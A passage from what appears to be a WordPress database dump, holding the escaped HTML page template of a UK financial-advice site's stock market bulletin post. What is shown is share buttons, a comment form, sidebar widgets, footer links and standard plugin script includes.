class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\"><a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\"><a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\"><a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapril-2014-stock-market-bulletin%2F&amp;name=April+2014+Stock+Market+Bulletin&amp;description=We+started+last+month%E2%80%99s+bulletin+in+the+Crimea%2C+with+Russian+troops+in+de+facto+control+of+the+peninsula.+Well%2C+the+Crimea+is+now+part+of+Russia+again+and+the+collected+denunciations+and+threatened+sanctions+....\" target=\"_blank\" rel=\"nofollow\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\"><a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\"><a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\"><a href=\"mailto:?subject=April 2014 Stock Market Bulletin&amp;body=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author:</h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\"></div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../april-2014-stock-market-bulletin/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\"><input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8121\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"ed534b789c\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"25\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n\r\n&nbsp;\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\"><p>\r\n</p>\r\n<div class=\"tab-holder\">\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-hold tabs-wrapper\">\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n</p>\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</ul>\r\n<p>\r\n</p>\r\n<div class=\"tab-box tabs-container\">\r\n<p>&#13;\r\n										</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../5-facts-know-annuities/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 9th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"categories-3\" class=\"widget widget_categories\"><p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>Post Categories</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a>\r\n\r\n</div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\"><a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nRSS\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\"><a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<footer class=\"footer-area\">\r\n</p>\r\n<div class=\"avada-row\">\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<section class=\"columns columns-3\">\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\"><p>\r\n</p>\r\n<p>Our Latest Posts</p>\r\n<p>\r\n</p>\r\n<ul>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</ul>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>\r\n</p>\r\n<p>Contact Info</p>\r\n<p>\r\n</p>\r\n<div class=\"contact-info-container\">\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div style=\"clear:both;\"/></article>\r\n<p>\r\n</section>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<article class=\"col last\"/></footer>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<footer id=\"footer\">\r\n</p>\r\n<div class=\"avada-row\"/>&#13;\r\n	</footer>\r\n<p>\r\n</p>\r\n<p><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','April 2018 Stock Market Bulletin','Read about','publish','closed','closed','','april-2014-stock-market-bulletin','','','2017-09-21 17:34:37','2017-09-21 17:34:37','',0,'http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin',0,'post','',0),(48,1,'2017-09-21 16:34:26','2017-09-21 16:34:26','<body class=\"page page-id-106 page-child parent-pageid-30 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<ul class=\"social-networks social-networks-light\"><li class=\"facebook\"><a target=\"_blank\" href=\"https://en-gb.facebook.com/pages/Equity SMART/172732639431442\">Facebook</a>&#13;\n		<div class=\"popup\">&#13;\n			<div class=\"holder\">&#13;\n				<p>Facebook</p>&#13;\n			</div>&#13;\n		</div>&#13;\n	</li>&#13;\n			<li class=\"twitter\"><a target=\"_blank\" href=\"https://twitter.com/ReidScottRoss\">Twitter</a>&#13;\n		<div class=\"popup\">&#13;\n			<div class=\"holder\">&#13;\n				<p>Twitter</p>&#13;\n			</div>&#13;\n		</div>&#13;\n	</li>&#13;\n			<li class=\"linkedin\"><a target=\"_blank\" href=\"http://www.linkedin.com/company/2550529\">LinkedIn</a>&#13;\n		<div class=\"popup\">&#13;\n			<div class=\"holder\">&#13;\n				<p>LinkedIn</p>&#13;\n			</div>&#13;\n		</div>&#13;\n	</li>&#13;\n																		</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Now for a FREE 30-minute consultation<br/>on <big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"navigation\" class=\"menu\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom 